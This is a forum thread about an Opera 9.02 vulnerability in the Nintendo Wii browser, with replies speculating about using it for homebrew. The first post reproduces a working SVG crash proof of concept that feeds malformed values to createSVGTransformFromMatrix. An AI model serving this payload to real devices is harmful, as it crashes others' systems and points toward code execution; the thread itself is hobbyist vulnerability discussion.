Results 1 to 7 of 7

Thread: Opera Exploit on Nintendo Wii

                  
   
  1. #1
    Won Hung Lo wraggster's Avatar
    Join Date
    Apr 2003
    Location
    Nottingham, England
    Age
    53
    Posts
    140,426
    Blog Entries
    3209
    Rep Power
    50

    Rev Opera Exploit on Nintendo Wii

    Could this be a way in for the hackers, heres the details:

    There's a new Opera vulnerability out for 9.02 (the version the Wii runs) that it appears the wii is susceptible to as well. The vulnerability disclosure is here

    Test it out here. This will crash your Wii. Browse your wii to this site and then click this link

    The code was created by Jumper and is as follows:

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
    "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

    <svg id="mySVG" width="100%" height="100%" version="1.1"
    xmlns="http://www.w3.org/2000/svg">

    <rect width="300" height="100"
    style="fill:rgb(0,0,255);stroke-width:1;
    stroke:rgb(0,0,0)"/>

    <script>
    var svg = document.getElementById("mySVG");
    var matrix = svg.createSVGMatrix();
    var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};

    try{
    svg.createSVGTransformFromMatrix(matrix);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(randomObject);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(null);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(i);
    }catch(e){}
    try{
    svg.createSVGTransformFromMatrix(new Array(i));
    }catch(e){}
    </script>

    </svg>

  2. #2
    DS LUA Coder Junixx's Avatar
    Join Date
    Mar 2006
    Location
    Missouri, USA
    Posts
    1,386
    Rep Power
    76

    Default

    I've had problems with the Wii crashing using the shop channel sometimes

  3. #3
    DCEmu Rookie Dbgtgoten's Avatar
    Join Date
    Jan 2006
    Posts
    150
    Rep Power
    69

    Default

    I've had my whole wii freeze up and crash when randomly surfing for a while. Dun know maybe you could overload the cache or buffer to create a exploit?

  4. #4

  5. #5
    DCEmu Regular mcvader's Avatar
    Join Date
    May 2006
    Location
    Adelaide, South Oz
    Posts
    372
    Rep Power
    70

    Default

    is this really an exploit or just a complicated way to crash you're wii? I'm looking forward to see what becomes of this.

  6. #6
    DCEmu Rookie Dbgtgoten's Avatar
    Join Date
    Jan 2006
    Posts
    150
    Rep Power
    69

    Default

    Well on the site it says "Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host" so you know if someone were able to take that it might open a backdoor of somekind since you can run arbitrary code on the affected host. But again we need a proof of concept. So hopefully someone looks into this

  7. #7
    DCEmu Regular Nicko01's Avatar
    Join Date
    Jun 2006
    Location
    www.nicko01.com
    Age
    31
    Posts
    434
    Rep Power
    71

    Default

    Opera Buffer Overflow!!!!
    Just like the Tiff overflow for psp. It just crashed the psp. until someone figured it out.
    I believe the Wii will be easy to hack.
    The internet browser was the first thing i though of when i got my wii. Internet browsers are hacked easily due to the fact that people hack them often. And in consoles, they can't make someone update it. then, HOMEBREW!!!
    oh yea!!!
    first we need to get this hack done and then make it add a homebrew channel.
    an eloader type of thing maybe.
    I hope that would work

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •